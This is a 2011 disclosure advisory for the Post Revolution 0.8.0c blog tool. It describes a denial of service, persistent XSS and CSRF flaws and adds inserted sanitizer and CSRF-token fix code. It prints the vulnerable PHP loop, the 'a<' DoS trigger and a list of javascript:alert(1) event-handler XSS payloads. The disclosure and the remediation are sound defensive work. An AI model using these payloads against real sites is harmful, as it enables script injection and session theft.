Post Revolution 0.8.0c XSS / XSRF / Denial Of Service

Posted Jun 1, 2011
Authored by Javier Bassi

Post Revolution version 0.8.0c suffers from cross site request forgery, cross site scripting, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, xss, info disclosure, csrf
advisories | CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
SHA-256 | c326ab8cc2255d5e582a5a5c103cc9b9e6e64ac1effb215d3c8e08c05d0b1799

info
———————————
Name : Post Revolution 0.8.0c Multiple Remote Vulnerabilities
Class: Design Error && Input Validation Error
CVE: CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
Remote: Yes
Local: No
Credit : Javier Bassi <javierbassi [at] gmail [dot] com>
Vulnerable : All versions prior to and including 0.8.0c are affected.
Vendor Homepage : http://postrev.com.ar



description
———————————
Post Revolution is an open source blog tool and publishing platform
powered by PHP and MySQL.



discussion
———————————
Post Revolution is prone to multiple remote vulnerabilities, including:
1. A Denial of service vulnerability. (CWE-835) (CVE-2011-1952)
2. Persistent Cross-site scripting vulnerabilities. (CWE-79) (CVE-2011-1953)
3. Cross-site request forgery vulnerabilities. (CWE-352) (CVE-2011-1954)

An attacker may leverage these issues to cause a denial-of-service
condition, perform certain administrative actions, execute arbitrary
script code in the browser of an unsuspecting user in the context of
the website, steal cookie-based authentication credentials, and gain
unauthorized access to the affected application.
Post Revolution 0.8.0c is vulnerable.



timeline
———————————
2011.05.22 – Informed developers
2011.05.23 – Patch for issues 1 & 2 released.
2011.06.01 – Disclosed



details/pocs
———————————
1. Denial of Service vulnerability
Post Revolution allows some HTML tags in comments and removes all
non-permitted ones.
The vulnerable code is in lines 456 to 462 of common.php:

while(stripos($s,'<') > 0){
    $pos[1] = stripos($s,'<');            // start of the next tag
    $pos[2] = stripos($s,'>', $pos[1]);   // end of that tag (fails when there is no '>')
    $len[1] = $pos[2] - $pos[1] + 1;
    $x = substr($s,$pos[1],$len[1]);      // the tag text to strip
    $s = str_replace($x,'',$s);           // no progress when $x is empty
}

This code tries to remove every non-permitted HTML tag; $s is the
content of the comment. An attacker could post a comment containing
just 'a<'. Then while(stripos($s,'<') > 0) is always true, because
$pos[1] = 1, $pos[2] is NULL, $len[1] = 0 and therefore $x is NULL, so
$s is 'a<' again on every iteration.
This causes an infinite loop that ends only when PHP kills the script,
printing:
Fatal error: Maximum execution time of 30 seconds exceeded in
/var/www/postrev/common.php on line 459


2. Cross-site scripting vulnerabilities.
Post Revolution allows the following tags in comments:
p,strong,a,em,i,img,li,ol,video,blockquote
and does not sanitize their attributes.
So the following XSS vectors work:
<a href="javascript:alert(1)">some text</a>
<p onmouseover="javascript:alert(1)">some text</p>
<a href="" onmouseover="javascript:alert(1);">some text</a>
<em onmouseover="javascript:alert(1)">some text</em>
<strong onmouseover="javascript:alert(1)">some text</strong>
<i onmouseover="javascript:alert(1)">some text</i>
<img src="https://encrypted.google.com/images/logos/ssl_logo_lg.gif"
onmouseover="javascript:alert(1)" />
<ol><li onmouseover="javascript:alert(1)">some text</li></ol>
<ol onmouseover="javascript:alert(1)"><li>1</li><li>2</li></ol>
<blockquote onmouseover="javascript:alert(1)">some text</blockquote>

The same works with other events such as onclick, onmouseout, onmousemove, onkeydown, etc.
Also note that PR does not close the tag for you, so it is not
necessary for the admin to mouse over the comment itself. If the attacker
posts <p onmouseover="javascript:alert(1)">some text
the mouseover event is triggered whenever the admin moves the mouse
anywhere below the attacker's comment.
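The DoS in section 1 and the XSS in section 2 share one root cause: the comment filter tries to strip HTML with string searches that neither guarantee progress nor look at attributes. The following allow-list sanitizer is an added example, not Post Revolution's code, written to show what a filter that addresses both looks like: it parses with libxml (so an unterminated '<' such as 'a<' is just text and the function always returns), removes every attribute that is not explicitly allowed (so no on* handler survives), rejects href and src values whose scheme is not http or https (so javascript: URLs are dropped, including entity-encoded ones, because the DOM decodes them before the check), and closes unclosed tags so a comment cannot capture mouse events on the rest of the page. The tag list is the advisory's (minus video); the attribute and scheme lists, and the function names, are this example's own choices.

```php
<?php
// Added example, not Post Revolution code: allow-list comment sanitizer built
// on DOMDocument. Tag names come from the advisory; the attribute and scheme
// allow-lists below are this example's own choices.
declare(strict_types=1);

const ALLOWED_TAGS    = ['p', 'strong', 'a', 'em', 'i', 'img', 'li', 'ol', 'blockquote'];
const ALLOWED_ATTRS   = ['a' => ['href'], 'img' => ['src', 'alt']];
const ALLOWED_SCHEMES = ['http', 'https'];

// Accept relative URLs and absolute URLs whose scheme is allow-listed.
function safe_url(string $url): bool
{
    // Browsers ignore control characters and whitespace inside a scheme
    // (e.g. "java\tscript:"), so strip them before inspecting it.
    $probe = preg_replace('/[\x00-\x20]+/', '', $url);
    if (!preg_match('/^([a-z][a-z0-9+.-]*):/i', $probe, $m)) {
        return true;                       // no scheme: relative URL
    }
    return in_array(strtolower($m[1]), ALLOWED_SCHEMES, true);
}

// Walk the children of $parent, removing or unwrapping what is not allowed.
function clean_children(DOMNode $parent): void
{
    // Iterate over a snapshot because the live child list is modified below.
    foreach (iterator_to_array($parent->childNodes) as $child) {
        if ($child instanceof DOMText) {
            continue;                      // text is entity-escaped on output
        }
        if (!$child instanceof DOMElement) {
            $parent->removeChild($child);  // comments, processing instructions
            continue;
        }
        clean_children($child);            // depth first: unwrapped children are already clean
        $tag = strtolower($child->tagName);
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            if (in_array($tag, ['script', 'style'], true)) {
                $parent->removeChild($child);          // drop the content as well
            } else {
                while ($child->firstChild !== null) {  // keep the text, drop the element
                    $parent->insertBefore($child->firstChild, $child);
                }
                $parent->removeChild($child);
            }
            continue;
        }
        $allowed = ALLOWED_ATTRS[$tag] ?? [];
        foreach (iterator_to_array($child->attributes) as $attr) {
            $name = strtolower($attr->name);
            $keep = in_array($name, $allowed, true)
                && !(in_array($name, ['href', 'src'], true) && !safe_url($attr->value));
            if (!$keep) {
                $child->removeAttribute($attr->name);  // on* handlers never get here
            }
        }
    }
}

function sanitize_comment(string $html): string
{
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // malformed input is expected; stay quiet
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>', LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $root = $doc->getElementsByTagName('div')->item(0);   // our wrapper is the first div
    if ($root === null) {
        return '';
    }
    clean_children($root);

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);     // serialises text with entities escaped
    }
    return $out;
}

// Constructed sample inputs taken from the vectors in the advisory.
$samples = [
    'a<',
    '<p onmouseover="javascript:alert(1)">some text',
    '<a href="javascript:alert(1)">some text</a>',
    '<a href="https://example.com/">ok</a>',
    '<img src="https://example.com/logo.gif" onmouseover="javascript:alert(1)" />',
];
foreach ($samples as $s) {
    echo sanitize_comment($s), "\n";
}
```

Run it with `php sanitize.php`: 'a<' comes back as escaped text without any loop, the unclosed paragraph is emitted as `<p>some text</p>` with its handler removed, the javascript: link loses its href while the https: link keeps it, and the img keeps only src. If a site does not actually need HTML in comments, the advisory's own one-line htmlspecialchars() replacement below is the simpler and safer choice; this example is for the case where a limited tag set must be kept.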


3. Cross-site request forgery vulnerabilities.
There is CSRF everywhere in ajax-weblog-guardar.php, verpost.php,
comments.php, perfil.php, etc. PR 0.8.0c has absolutely no protection
against CSRF in any form except for anonymous comments and
registration that has a captcha.
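The fix the advisory says "will require some coding" is a synchroniser token: an unpredictable per-session value that every state-changing request must echo back and that a cross-site page cannot read. The following is an added example, not Post Revolution's code, showing the three pieces such a fix needs in PHP: token creation, emission into forms (or into a request header for AJAX callers such as ajax-weblog-guardar.php), and constant-time verification at the top of each handler. The names csrf_token and X-CSRF-Token are this example's own choices.

```php
<?php
// Added example, not Post Revolution code: synchroniser-token CSRF protection
// for state-changing PHP handlers. Field and header names are this example's
// own choices.
declare(strict_types=1);

function csrf_session_start(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // SameSite=Lax on the session cookie is an independent second layer:
        // cross-site POSTs then arrive without the session cookie at all.
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
        session_start();
    }
}

// One unpredictable token per session, created on first use.
function csrf_token(): string
{
    csrf_session_start();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));   // 256 bits from the CSPRNG
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to put into every form that changes state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison; a missing session token is a failure, never a pass.
function csrf_valid(?string $submitted): bool
{
    csrf_session_start();
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($submitted === null || $expected === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Call at the top of any handler that modifies data (verpost.php,
// comments.php, perfil.php, ...). Such handlers must only act on POST;
// a GET that changes state is forgeable from an <img> tag alone.
function require_csrf(): void
{
    $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
    $token  = $_POST['csrf_token'] ?? $_SERVER['HTTP_X_CSRF_TOKEN'] ?? null;
    if ($method !== 'POST' || !csrf_valid(is_string($token) ? $token : null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
}

// Usage in a form template:
//   <form method="post" action="comments.php"> <?= csrf_field() ?> ... </form>
// Usage in a handler, before any write:
//   require_csrf();
// Usage from JavaScript: read the token from the page and send it in the
// X-CSRF-Token request header with each XMLHttpRequest.
```

The token is compared with hash_equals() so that a byte-by-byte mismatch does not leak timing information, and the check fails closed when either side is missing. The captcha the advisory mentions for anonymous comments and registration is a separate mechanism and does not protect any of the authenticated handlers; every one of them needs the check above.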



solution
———————————
You can fix the DoS and XSS vulnerabilities quickly by replacing the whole
check_html function in common.php (lines 416 to 471) with:

function check_html($s){
    return htmlspecialchars($s);   // encode everything; no tags survive
}

Users will not be able to format their comments with HTML but Post
Revolution already has BBcode so there was no need of HTML in comments
in the first place.
NO HTML FOR YOU!

Fixing the CSRFs will require some coding.
Vendor has released a patch for issues 1 and 2:
postrev.com.ar



References
———————————
1. Advisory URL: http://javierb.com.ar/2011/06/01/postrev-vunls/